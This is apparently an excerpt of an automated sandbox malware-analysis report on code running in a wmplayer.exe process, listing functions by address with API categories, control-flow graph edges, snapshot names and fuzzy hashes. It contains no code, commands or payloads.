                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4069062851-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c7195d019d03cdc00b56436f2abd500d2360babbb3f004d2e821507a98ec452
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D41193151CA488BE755EB64C899BDBB3E1FF94301F008A2EE48FC6191EF799504CB42
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE84C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 552242919-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e0480db0fda1fe2c9f55d0f36e690e74b5a3b383b4a44cf8ede3464c01250e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA41C774618B488FE759EF3CE8585AA77E1FBA9300F51462EE04BC32A1DB389515CB42
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8208C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModeclosesocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2183620661-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                                                                                                                                                                          • Instruction ID: 03ab433b779fc6e06d5c1c96726781cf2b2bd83ec79ad12f1216e33a032f9679
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5141547061CA488FE758EF28D8589AA77E1FF98300F51C62AE49BC32A1DF7C9545CB41
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDE2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID: rE\
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-988334199
                                                                                                                                                                                                                                                                                                          • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 682eae54e4d44c9630347260decb45d49f26c1bd374ba1d5ebfbb411c03245e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2911C4313089890BEB45F768A895BF972D6F7F8344F40152B950BC3286DE28DE668783
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDBC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CloseHandleMappingOpenView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2553196624-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 415f8c0571b75c1991b96738212bb360d575a4f83167df857c6c0e594fa1838b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931A13161998C4FEB55FF24D8896EAB3D4FBB4344F10452FE44BC3196EA30E6188782
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDBA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 716092398-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5074a02046e128dbccf3f0c164d2ed56f2a77c304b4e98521fb94597c30271e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3514170518B848FD765EF24D88A79ABBE4FBA9351F10462FE08EC2290DF349545CB83
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81B47B8 Relevance: 3.3, APIs: 2, Instructions: 339windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 312 7df4f81b47b8-7df4f81b47f0 call 7df4f81b1478 315 7df4f81b4b0d-7df4f81b4b32 call 7df4f81b55b0 312->315 316 7df4f81b47f6-7df4f81b480e call 7df4f81b1538 312->316 316->315 321 7df4f81b4814-7df4f81b4845 call 7df4f81b1708 call 7df4f81b1740 call 7df4f81b1818 316->321 321->315 329 7df4f81b484b-7df4f81b485d 321->329 329->315 331 7df4f81b4863-7df4f81b4880 329->331 333 7df4f81b4886-7df4f81b48f6 call 7df4f81bdb48 * 3 331->333 334 7df4f81b4958-7df4f81b4a0d call 7df4f81bdb48 call 7df4f81b28d4 call 7df4f81bdb72 call 7df4f81bdb6c call 7df4f81bdb66 SendMessageA 331->334 352 7df4f81b4953-7df4f81b4956 333->352 373 7df4f81b4a12-7df4f81b4a18 334->373 352->334 354 7df4f81b48f8-7df4f81b48fb 352->354 357 7df4f81b48fd-7df4f81b4901 354->357 358 7df4f81b4909-7df4f81b4921 calloc 354->358 357->358 360 7df4f81b4903-7df4f81b4907 357->360 361 7df4f81b4a7e 358->361 362 7df4f81b4927-7df4f81b4945 call 7df4f81b55d0 358->362 360->358 364 7df4f81b4950-7df4f81b4951 360->364 367 7df4f81b4a87-7df4f81b4a8a 361->367 371 7df4f81b4a5c-7df4f81b4a60 362->371 372 7df4f81b494b-7df4f81b494c 362->372 364->352 369 7df4f81b4a8c-7df4f81b4a8f 367->369 370 7df4f81b4af5-7df4f81b4af6 367->370 374 7df4f81b4ade 369->374 375 7df4f81b4a91-7df4f81b4ab4 call 7df4f81bdb48 369->375 381 7df4f81b4afe-7df4f81b4b08 call 7df4f81b2730 370->381 376 7df4f81b4a62-7df4f81b4a66 371->376 377 7df4f81b4a6b-7df4f81b4a6f 371->377 378 7df4f81b494e 372->378 373->381 382 7df4f81b4a1e-7df4f81b4a24 373->382 379 7df4f81b4ae0-7df4f81b4af3 374->379 392 7df4f81b4abe-7df4f81b4ad6 call 7df4f81bdb48 375->392 393 7df4f81b4ab6-7df4f81b4abc 375->393 376->378 377->378 380 7df4f81b4a75-7df4f81b4a79 377->380 378->364 379->367 379->370 380->378 381->315 382->381 385 7df4f81b4a2a-7df4f81b4a3e 382->385 385->381 391 7df4f81b4a44-7df4f81b4a57 call 7df4f81b55d0 385->391 391->379 392->374 393->374
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2453823186-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                                                                                                                                          • Instruction ID: c191d9e3199e245dbdb9e91668a2851c4b9d77cd5f650bd3a574e206fc762d04
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7B12E31A5CA484BEBA9EF24D5845AB73E1EF94300F548B2AE04FC7192DE38E915C781
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8204290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2453823186-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                                                                                                                                          • Instruction ID: a37558179a4dc401233842aaede3b05ba64c0f641fa249d10040a6a9af603050
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B371513065CA488FDB98EF28D8815AB73F1FF54704B51866AE44FCB196DA78F9018BC1
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD22D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 523 21ab2fd22d4-21ab2fd2303 GetSystemInfo 524 21ab2fd2313-21ab2fd2329 523->524 525 21ab2fd2305-21ab2fd2310 523->525 526 21ab2fd232f-21ab2fd2332 524->526 525->524 527 21ab2fd2334-21ab2fd2337 526->527 528 21ab2fd234e-21ab2fd2354 526->528 529 21ab2fd2349-21ab2fd234c 527->529 530 21ab2fd2339-21ab2fd233c 527->530 531 21ab2fd2356-21ab2fd2366 528->531 532 21ab2fd23cf-21ab2fd23d2 528->532 529->526 530->529 534 21ab2fd233e-21ab2fd2343 530->534 535 21ab2fd2395-21ab2fd239b 531->535 533 21ab2fd245e 532->533 538 21ab2fd2460-21ab2fd2463 533->538 539 21ab2fd246b-21ab2fd2482 533->539 534->529 540 21ab2fd24b1-21ab2fd24c3 534->540 536 21ab2fd2368-21ab2fd237f 535->536 537 21ab2fd239d 535->537 536->537 551 21ab2fd2381-21ab2fd2389 536->551 541 21ab2fd239f-21ab2fd23a2 537->541 542 21ab2fd23d7-21ab2fd23f5 538->542 543 21ab2fd2469 538->543 544 21ab2fd2484-21ab2fd249e 539->544 541->532 546 21ab2fd23a4-21ab2fd23c4 VirtualAlloc 541->546 548 21ab2fd2437 542->548 549 21ab2fd23f7-21ab2fd240e 542->549 543->540 544->544 547 21ab2fd24a0-21ab2fd24ab 544->547 546->539 552 21ab2fd23ca-21ab2fd23cd 546->552 547->540 550 21ab2fd2439-21ab2fd243c 548->550 549->548 556 21ab2fd2410-21ab2fd2418 549->556 550->540 553 21ab2fd243e-21ab2fd245c 550->553 551->541 554 21ab2fd238b-21ab2fd2393 551->554 552->531 552->532 553->533 554->535 554->537 556->550 558 21ab2fd241a-21ab2fd2435 556->558 558->548 558->549
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocInfoSystemVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3440192736-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                          • Instruction ID: daee3b47e2db2db0f1bff672a0e0a786676b5568934bfa3bd2e73d4e80ce7946
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C651B13021DE4D4FFB55EA7C948C3A972D1F7B8385F54012BE849C3196EA64E9A1C7C2
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDD7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3964672402-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                                                                                                                                          • Instruction ID: a9db154f1174b73a577206e12f40dd92f08826cefb7efd36fcf36bf92f1f7e25
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B4183712199484FE746FF78D899BE673D4EBB5345F00051BA40AC2196DF34FA25CB82
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD2978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                                                                                                                                          • Instruction ID: 292a82fb21cad2001136e73c41c920dbb2fe03698aa3531cf7a545e80235c5ef
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22315A3030CA854FEB109B3CD8987953BD1FB6A354F150296E89DC72CACB58D812C386
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81D1D6C Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693991143.00007DF4F81D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81D1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81d1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9f38bc173311d6ed7acd9241e14fb2c6f98ad2775c7ebba7821b6506f4053fa3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4def39fa6c209fc9f4da160c01834c86c79239dff7178a4dd8578851ada3217c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f38bc173311d6ed7acd9241e14fb2c6f98ad2775c7ebba7821b6506f4053fa3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21A633A4898647FB988A68D594BB6F3F1FF94300F14872BE44FCB185D768E941C255
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8201740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: a8574f8fc5aa141c9644f7eddac19f82a4d884086254434c748bda329b42503b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021E23164864557EB989B6D9894677B3F1FF94300F15822EE44FCB296D76CF8018245
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81B1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                                                                                                                                                                          • Instruction ID: 937e18054ccdf5606ce94aeda7d92db479d807b8064171cae4b8b8262fe23e11
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF21BF35A4868547EB989B68D684666B3E5FFD4308F29833AE44FCB285D668E801C285
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A12C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0dc8751f8edbd045ff7a12a638ddd067a15150168d9780b97d3b2e3fb24fb7ae
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49210539E4854547FB988F2CC580676B3F5FF90360F14833AE84FCBA85D668E881C246
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A12C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                                                                                                                                          • Instruction ID: bba5b444bf94b80f6eb52424b06667ce7c0382e42c0f3909bb371bf087fc12cd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9210239A4858547FB988F2CC580676B3F5FF90360F14833BE84FCBA85D668E881C246
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDCC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ecfc7704e8c96e9dc7ffd9299176f768be561c407c992aaa806ecab3454dfaa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
